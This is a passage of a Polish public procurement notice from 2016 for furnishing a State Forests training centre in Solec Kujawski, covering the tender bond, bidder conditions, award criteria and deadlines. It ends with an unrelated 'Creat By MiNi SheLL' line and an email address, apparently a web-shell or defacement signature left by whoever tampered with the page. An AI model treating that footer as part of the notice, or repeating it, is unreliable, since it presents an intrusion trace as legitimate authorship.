<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu jest wymagane wadium. Zamawiający wymaga wniesienia wadium w wysokości 5 000,00 zł (słownie: pięć tysięcy złotych 00/100).
Wadium może być wnoszone  w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -   kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych
4) gwarancjach ubezpieczeniowych
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt.2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2016 r., poz. 359).
Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy zamawiającego: 
PKO SA. O/Solec Kujawski nr: 26 1240 3507 1111 0000 3057 6287 z dopiskiem jakiego postępowania dotyczy: Dostawa i montaż wyposażenia, w tym m.in. umeblowania i sprzętu RTV i AGD w Ośrodku Szkoleniowo-Wypoczynkowym Lasów Państwowych przy Nadleśnictwie Solec Kujawski lub skrót pozwalający na identyfikację w/w nazwy zadania (Znak sprawy ZG.270.1.2.2016).
Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej, lub poręczeniach udzielanych przez podmioty, których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, należy w formie nienaruszonego oryginału zdeponować 
u zamawiającego w kasie - pokój nr 6 lub załączyć do oferty.
Z treści wadium wnoszonego w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej, lub poręczeniach udzielanych  przez podmioty, których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych.
Wadium musi być wniesione najpóźniej przed upływem terminu składania ofert.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym zamawiającego. Wadium musi zabezpieczać cały okres związania ofertą. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium w wyznaczonym terminie zostanie wykluczony  z postępowania, a jego oferta zostanie odrzucona.
Za moment wniesienia wadium w formie pieniądza uznaje się moment zaliczenia na rachunku  bankowym zamawiającego. 
W przypadku wniesienia wadium w innej formie niż pieniądz, termin ważności wystawionego dokumentu musi być minimum  zgodny z terminem związania ofertą.
W przypadku wniesienia wadium w formie gwarancji/poręczenia, gwarancja/poręczenie powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać między innymi następujące elementy:
1) nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji/poręczenia (zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,
2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem - określenie przedmiotu zamówienia,
3) kwotę gwarancji/poręczenia,
4) bezwarunkowe zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty gwarancji/poręczenia na pierwsze pisemne żądanie zamawiającego w okolicznościach określonych w art. 46 ust. 4a ustawy Pzp oraz art. 46 ust. 5 ustawy Pzp. 
Pozostałe zasady dotyczące wadium określa art. 45 i 46 ustawy Pzp. 
Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert.
Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo.
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których  mowa w art. 25 ust. 1 ustawy Pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej o której mowa w art. 24 ust. 2 pkt. 5 ustawy Pzp lub informacji o tym, że nie należy do grupy kapitałowej lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
Zamawiający będzie żądać od wykonawcy, którego oferta została wybrana jako najkorzystniejsza, wniesienia zabezpieczenia należytego wykonania umowy w wysokości 10% ceny całkowitej podanej w ofercie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nie nakładają obowiązku ich posiadania, zamawiający nie precyzuje żadnych warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wiedzy i doświadczenia w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował należycie co najmniej jedną dostawę (w ramach jednej umowy) o charakterze odpowiadającym przedmiotowi zamówienia (dostawa mebli lub sprzętu RTV, AGD) o wartości co najmniej 50 000 zł.
W celu wykazania spełnienia warunków udziału w postępowaniu do ofert należy załączyć następujące oświadczenia i dokumenty:
Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw (mebli lub sprzętu RTV, AGD), w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, wraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
Dowodami o których mowa powyżej są:
- poświadczenie,
- oświadczenie, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać w/w poświadczenia.
Zamawiający określa obowiązek wykazania przez wykonawcę w wykazie i złożenia poświadczenia, dotyczący:
- co najmniej 1 dostawy o charakterze odpowiadającym przedmiotowi zamówienia i o wartości co najmniej 50 000 zł. Wykaz przygotować zgodnie z załącznikiem nr 5 do SIWZ.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia. Zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym do należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda złożenia w ofercie stosownych dowodów w zakresie niezbędnym do udowodnienia, iż wykonawca dysponuje zasobami niezbędnymi dla należytego wykonania danego zamówienia. Dowodami tymi mogą być dokumenty dotyczące w szczególności: 
a) zakresu dostępnych wykonawcy zasobów innego podmiotu, 
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 
c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
Wykonawca celem udowodnienia faktycznego, czynnego korzystania z zasobów innych podmiotów w szczególności może przedstawić w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia zawierające informacje określone w powyższych podpunktach od a) do d).
Jeżeli w ocenie zamawiającego informacje będą niewystarczające tj. zamawiający uzna, iż wykonawca w niewystarczający sposób udowodnił dysponowanie niezbędnymi zasobami podmiotów trzecich dla spełnienia warunków udziału w postępowaniu zażąda - na podstawie art. 26 ust 3 Pzp - odpowiednich dokumentów od wykonawcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie potencjału technicznego niezbędnego do realizacji przedmiotu zamówienia zamawiający nie precyzuje żadnych warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania, osobami niezbędnymi do realizacji przedmiotu zamówienia zamawiający nie precyzuje żadnych warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie sytuacji ekonomicznej i finansowej posiada środki finansowe lub zdolność kredytową do wykonania zamówienia na kwotę minimum: 150 000 zł. 
W celu wykazania spełnienia warunków udziału w postępowaniu do ofert należy załączyć następujące oświadczenia i dokumenty:
Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Z dokumentu ma wynikać, że wykonawca dysponuje środkami finansowymi lub zdolnością kredytową na wartość minimum 150 000 zł.
Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia. Zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym do należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda złożenia w ofercie stosownych dowodów w zakresie niezbędnym do udowodnienia, iż wykonawca dysponuje zasobami niezbędnymi dla należytego wykonania danego zamówienia. Dowodami tymi mogą być dokumenty dotyczące w szczególności: 
a) zakresu dostępnych wykonawcy zasobów innego podmiotu, 
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 
c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
Wykonawca celem udowodnienia faktycznego, czynnego korzystania z zasobów innych podmiotów w szczególności może przedstawić w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia zawierające informacje określone w powyższych podpunktach od a) do d).
Jeżeli w ocenie zamawiającego informacje będą niewystarczające tj. zamawiający uzna, iż wykonawca w niewystarczający sposób udowodnił dysponowanie niezbędnymi zasobami podmiotów trzecich dla spełnienia warunków udziału w postępowaniu zażąda - na podstawie art. 26 ust 3 Pzp - odpowiednich dokumentów od wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Przed zawarciem umowy w sprawie zamówienia publicznego, wykonawca, którego oferta została uznana za najkorzystniejszą, zobowiązany jest dopełnić następujących formalności:
a) przedłożyć umowę konsorcjum, jeżeli zamówienie będzie realizowane przez konsorcjum wykonawców,
b) przedłożyć umowę spółki cywilnej, jeżeli zamówienie będzie realizowane przez spółkę cywilną,
c) przedłożyć ubezpieczenie od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość minimum 200 000 zł. Ubezpieczenie musi być zawarte i opłacone na cały okres, na który zostanie podpisana umowa, ewentualnie wykonawca dostarczy aktualną i opłaconą polisę OC w zakresie prowadzonej działalności na okres krótszy jak okres obowiązywania umowy, wraz z oświadczeniem o kontynuacji i ciągłości ubezpieczenia OC przez cały okres obowiązywania umowy.
d) przedłożyć do akceptacji treść zabezpieczenia należytego wykonania umowy w sytuacji składania jego w innej formie jak formie pieniądza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Termin wykonania - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
Zmiana terminu realizacji przedmiotu umowy.
1) Zmiany będące następstwem okoliczności leżących po stronie zamawiającego, 
w szczególności:
a) wstrzymanie prac przez zamawiającego,
b) konieczność usunięcia błędów lub wprowadzenia zmian w założeniach,
2) Inne przyczyny zewnętrzne niezależne od zamawiającego oraz wykonawcy skutkujące niemożliwością prowadzenia prac.
3) W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1) - 2) termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 
Zmiana sposobu spełnienia świadczenia.
Zmiany technologiczne, w szczególności:
a) konieczność zrealizowania realizowanej dostawy przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane specyfikacji technicznej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu,
b) konieczność zrealizowania realizowanej dostawy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa. 
Zmiany wskazywane w lit b) będą wprowadzane wyłącznie w zakresie umożliwiającym oddanie przedmiotu umowy do użytkowania, a zamawiający może ponieść ryzyko zwiększenia wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej zwiększonym z tego powodu kosztom. 
Każda ze wskazywanych w lit a - b) zmian może być powiązana z obniżeniem wynagrodzenia na zasadach określonych przez Strony. 
Pozostałe dopuszczalne zmiany postanowień zawartej umowy.
a) zmiana obowiązującej stawki VAT:
jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie wykonawcy, zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez wykonawcę, 
jeśli  zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie wykonawcy, zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez wykonawcę,
b) rezygnacja przez zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami,
Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2015 r., poz. 2164):
a) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego), 
b) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami,
Zamawiający zastrzega sobie prawo do odstąpienia od zawarcia umowy w wyjątkowych sytuacjach, zgodnie z art. 145 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2015 r., poz. 2164).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.solec-kujawski.torun.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Solec Kujawski, ul. Leśna 64, 86-050 Solec Kujawski - pokój nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2016 godzina 08:30, miejsce: Nadleśnictwo Solec Kujawski, ul. Leśna 64, 86-050 Solec Kujawski - pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com